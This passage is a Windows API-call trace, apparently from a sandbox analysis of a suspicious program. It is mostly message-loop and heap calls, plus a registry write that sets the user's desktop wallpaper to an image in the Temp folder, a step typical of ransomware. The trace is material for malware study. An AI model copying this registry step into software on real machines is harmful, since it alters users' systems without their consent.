lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.771] Sleep (dwMilliseconds=0xa) [0232.790] timeGetTime () returned 0x117a2b6 [0232.790] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.790] Sleep (dwMilliseconds=0xa) [0232.803] timeGetTime () returned 0x117a2c6 [0232.803] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.803] Sleep (dwMilliseconds=0xa) [0232.831] timeGetTime () returned 0x117a2d8 [0232.831] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.831] Sleep (dwMilliseconds=0xa) [0232.848] timeGetTime () returned 0x117a2f5 [0232.849] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.849] Sleep (dwMilliseconds=0xa) [0232.866] timeGetTime () returned 0x117a304 [0232.866] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.866] Sleep (dwMilliseconds=0xa) [0232.885] timeGetTime () returned 0x117a314 [0232.885] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.885] Sleep (dwMilliseconds=0xa) [0232.912] timeGetTime () returned 0x117a333 [0232.912] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.912] Sleep (dwMilliseconds=0xa) [0232.926] timeGetTime () returned 0x117a343 [0232.927] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.927] Sleep (dwMilliseconds=0xa) [0232.942] timeGetTime () returned 0x117a353 [0232.942] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.942] Sleep (dwMilliseconds=0xa) [0232.957] timeGetTime () returned 0x117a362 [0232.958] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.958] Sleep (dwMilliseconds=0xa) [0232.974] timeGetTime () returned 0x117a372 [0232.974] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.974] Sleep (dwMilliseconds=0xa) [0232.989] timeGetTime () returned 0x117a381 [0232.989] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.989] Sleep (dwMilliseconds=0xa) [0233.006] timeGetTime () returned 0x117a391 [0233.006] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.006] Sleep (dwMilliseconds=0xa) [0233.021] timeGetTime () returned 0x117a3a1 [0233.021] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.021] Sleep (dwMilliseconds=0xa) [0233.036] timeGetTime () returned 0x117a3b0 [0233.036] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.036] Sleep (dwMilliseconds=0xa) [0233.051] timeGetTime () returned 0x117a3c0 [0233.051] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.051] Sleep (dwMilliseconds=0xa) [0233.124] timeGetTime () returned 0x117a3fe [0233.124] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.124] Sleep (dwMilliseconds=0xa) [0233.145] timeGetTime () returned 0x117a41e [0233.145] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.145] Sleep (dwMilliseconds=0xa) [0233.161] timeGetTime () returned 0x117a42d [0233.161] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.161] Sleep (dwMilliseconds=0xa) [0233.177] timeGetTime () returned 0x117a43d [0233.177] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.177] Sleep (dwMilliseconds=0xa) [0233.193] timeGetTime () returned 0x117a44d [0233.193] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.193] Sleep (dwMilliseconds=0xa) [0233.210] timeGetTime () returned 0x117a45e [0233.210] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.210] Sleep (dwMilliseconds=0xa) [0233.239] timeGetTime () returned 0x117a47b [0233.239] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.239] Sleep (dwMilliseconds=0xa) [0233.256] timeGetTime () returned 0x117a48b [0233.256] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.256] Sleep (dwMilliseconds=0xa) [0233.270] timeGetTime () returned 0x117a49b [0233.270] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.270] Sleep (dwMilliseconds=0xa) [0233.286] timeGetTime () returned 0x117a4aa [0233.286] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.286] Sleep (dwMilliseconds=0xa) [0233.301] timeGetTime () returned 0x117a4ba [0233.301] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.301] Sleep (dwMilliseconds=0xa) [0233.317] timeGetTime () returned 0x117a4ca [0233.317] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.317] Sleep (dwMilliseconds=0xa) [0233.333] timeGetTime () returned 0x117a4d9 [0233.333] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.333] Sleep (dwMilliseconds=0xa) [0233.350] timeGetTime () returned 0x117a4e9 [0233.350] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.350] Sleep (dwMilliseconds=0xa) [0233.365] timeGetTime () returned 0x117a4f8 [0233.365] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.365] Sleep (dwMilliseconds=0xa) [0233.379] timeGetTime () returned 0x117a508 [0233.379] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.379] Sleep (dwMilliseconds=0xa) [0233.397] timeGetTime () returned 0x117a518 [0233.397] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.397] Sleep (dwMilliseconds=0xa) [0233.411] timeGetTime () returned 0x117a527 [0233.411] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.411] Sleep (dwMilliseconds=0xa) [0233.427] timeGetTime () returned 0x117a537 [0233.427] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.427] Sleep (dwMilliseconds=0xa) [0233.442] timeGetTime () returned 0x117a547 [0233.442] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.442] Sleep (dwMilliseconds=0xa) [0233.460] timeGetTime () returned 0x117a558 [0233.462] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.462] Sleep (dwMilliseconds=0xa) [0233.474] timeGetTime () returned 0x117a567 [0233.474] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.474] Sleep (dwMilliseconds=0xa) [0233.489] timeGetTime () returned 0x117a576 [0233.489] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0233.489] TranslateMessage (lpMsg=0x8cf798) returned 0 [0233.489] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0233.489] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0233.489] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0233.489] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.489] Sleep (dwMilliseconds=0xa) [0233.517] timeGetTime () returned 0x117a592 [0233.517] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.517] Sleep (dwMilliseconds=0xa) [0233.535] timeGetTime () returned 0x117a5a2 [0233.535] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.536] Sleep (dwMilliseconds=0xa) [0233.552] timeGetTime () returned 0x117a5b1 [0233.552] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.552] Sleep (dwMilliseconds=0xa) [0233.565] timeGetTime () returned 0x117a5c1 [0233.565] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.565] Sleep (dwMilliseconds=0xa) [0233.581] timeGetTime () returned 0x117a5d1 [0233.581] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.581] Sleep (dwMilliseconds=0xa) [0233.596] timeGetTime () returned 0x117a5e0 [0233.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0233.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0233.597] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0233.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0233.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0233.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0233.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0233.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0233.598] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0233.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0233.598] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0233.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0233.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0233.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0233.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0233.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0233.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0233.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0233.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0233.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0233.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0233.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0233.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0233.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0233.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a733a8 [0233.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0233.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0233.600] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0233.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0233.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0233.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0233.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0233.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0233.600] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0233.601] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0233.601] RegCloseKey (hKey=0x4e0) returned 0x0 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a733a8 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0233.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0233.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0233.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0233.602] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0233.602] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0233.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0233.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0233.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0233.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0233.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0233.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0233.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0233.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0233.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0233.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, 